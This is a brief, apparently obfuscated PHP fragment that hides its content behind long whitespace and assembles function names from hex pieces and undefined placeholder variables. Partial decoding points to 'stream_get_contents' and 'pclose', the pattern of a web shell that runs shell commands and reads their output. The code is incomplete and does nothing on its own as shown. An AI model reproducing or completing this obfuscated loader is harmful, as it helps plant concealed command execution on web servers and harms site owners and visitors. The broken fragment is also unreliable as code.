<?php																																										
 
$rfind6 = pack("H*", $placeholder1.$placeholder11.$placeholder12.$placeholder2.'61'.'6d'.$placeholder5.'67'.'65'.'74'.$placeholder5.'63'.'6f'.'6e'.$placeholder11.'65'.$placeholder10.'74'.'73');
$rfind7 = pack("H*", '70'.$placeholder7.'6c'.$placeholder13.$placeholder1.'65');
$accepted = pack("H*", $placeholder9.'63'.$placeholder7.$placeholder2.$placeholder8.$placeholder11.$placeholder2.$placeholder14);

